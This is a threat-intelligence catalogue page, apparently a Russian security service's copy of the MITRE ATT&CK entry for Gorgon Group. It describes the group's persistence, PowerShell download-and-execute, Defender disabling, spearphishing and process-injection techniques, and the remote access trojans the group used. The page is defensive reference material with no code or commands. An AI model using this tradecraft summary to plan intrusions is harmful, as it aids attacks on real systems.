Cервис управления информационной безопасностью
Cервис управления информационной безопасностью
Поиск
Вход Регистрация
MITRE ATT&CK - Преступная группа Gorgon Group
Риски
Каталоги
MITRE ATT&CK
Преступная группа
Gorgon Group
Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.
Подробнее
Наш канал

Gorgon Group

Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. (Citation: Unit 42 Gorgon Group Aug 2018)
ID: G0078
Associated Groups: 
Version: 1.5
Created: 17 Oct 2018
Last Modified: 25 Apr 2025

Associated Group Descriptions
Name Description

Techniques Used
Domain ID Name Use
Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.(Citation: Unit 42 Gorgon Group Aug 2018)
.009 Boot or Logon Autostart Execution: Shortcut Modification

Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.(Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Gorgon Group malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim’s machine.(Citation: Unit 42 Gorgon Group Aug 2018)
.003 Command and Scripting Interpreter: Windows Command Shell

Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system.(Citation: Unit 42 Gorgon Group Aug 2018)

.005 Command and Scripting Interpreter: Visual Basic

Gorgon Group has used macros in Spearphishing Attachments as well as executed VBScripts on victim machines.(Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1564 .003 Hide Artifacts: Hidden Window

Gorgon Group has used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden. (Citation: Unit 42 Gorgon Group Aug 2018)
Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

Gorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender using the taskkill command.(Citation: Unit 42 Gorgon Group Aug 2018)
Enterprise T1588 .002 Obtain Capabilities: Tool

Gorgon Group has obtained and used tools such as QuasarRAT and Remcos.(Citation: Unit 42 Gorgon Group Aug 2018)
Enterprise T1566 .001 Phishing: Spearphishing Attachment

Gorgon Group sent emails to victims with malicious Microsoft Office documents attached.(Citation: Unit 42 Gorgon Group Aug 2018)
Enterprise T1055 .002 Process Injection: Portable Executable Injection

Gorgon Group malware can download a remote access tool, ShiftyBug, and inject into another process.(Citation: Unit 42 Gorgon Group Aug 2018)
.012 Process Injection: Process Hollowing

Gorgon Group malware can use process hollowing to inject one of its trojans into another process.(Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1204 .002 User Execution: Malicious File

Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.(Citation: Unit 42 Gorgon Group Aug 2018)

Software
ID Name References Techniques
S0332 Remcos (Citation: Fortinet Remcos Feb 2017) (Citation: Riskiq Remcos Jan 2018) (Citation: Talos Remcos Aug 2018) (Citation: Unit 42 Gorgon Group Aug 2018) Screen Capture, Keylogging, Audio Capture, Bypass User Account Control, System Checks, Clipboard Data, Process Injection, Modify Registry, Video Capture, Proxy, File and Directory Discovery, Registry Run Keys / Startup Folder, Obfuscated Files or Information, Python, Windows Command Shell, Ingress Tool Transfer
S0336 NanoCore (Citation: Cofense NanoCore Mar 2018) (Citation: DigiTrust NanoCore Jan 2017) (Citation: PaloAlto NanoCore Feb 2016) (Citation: Unit 42 Gorgon Group Aug 2018) Keylogging, Audio Capture, Symmetric Cryptography, Disable or Modify System Firewall, Modify Registry, Video Capture, System Network Configuration Discovery, Registry Run Keys / Startup Folder, Disable or Modify Tools, Obfuscated Files or Information, Uncommonly Used Port, Windows Command Shell, Visual Basic, Ingress Tool Transfer
S0385 njRAT (Citation: Bladabindi) (Citation: Fidelis njRAT June 2013) (Citation: FireEye Njw0rm Aug 2013) (Citation: LV) (Citation: Njw0rm) (Citation: Trend Micro njRAT 2018) (Citation: Unit 42 Gorgon Group Aug 2018) Screen Capture, System Owner/User Discovery, Standard Encoding, Keylogging, Encrypted/Encoded File, Fast Flux DNS, Peripheral Device Discovery, System Information Discovery, Native API, Replication Through Removable Media, Data from Local System, Application Window Discovery, Disable or Modify System Firewall, Modify Registry, Credentials from Web Browsers, Video Capture, Indicator Removal, File and Directory Discovery, Process Discovery, Exfiltration Over C2 Channel, PowerShell, Registry Run Keys / Startup Folder, Non-Standard Port, Query Registry, Compile After Delivery, Uncommonly Used Port, Windows Command Shell, Clear Persistence, File Deletion, Web Protocols, Remote System Discovery, Ingress Tool Transfer, Remote Desktop Protocol, Custom Command and Control Protocol
S0262 QuasarRAT (Citation: GitHub QuasarRAT) (Citation: Securelist APT10 March 2021) (Citation: TrendMicro Patchwork Dec 2017) (Citation: Unit 42 Gorgon Group Aug 2018) (Citation: Volexity Patchwork June 2018) (Citation: xRAT) Scheduled Task, System Owner/User Discovery, Keylogging, Bypass User Account Control, Symmetric Cryptography, Code Signing, System Information Discovery, Data from Local System, Credentials from Password Stores, Modify Registry, Credentials from Web Browsers, Video Capture, System Network Configuration Discovery, Proxy, Credentials In Files, Registry Run Keys / Startup Folder, Non-Standard Port, Non-Application Layer Protocol, System Location Discovery, Hidden Window, Windows Command Shell, Ingress Tool Transfer, Remote Desktop Protocol, Hidden Files and Directories

References

  1. Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.
Навигация

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.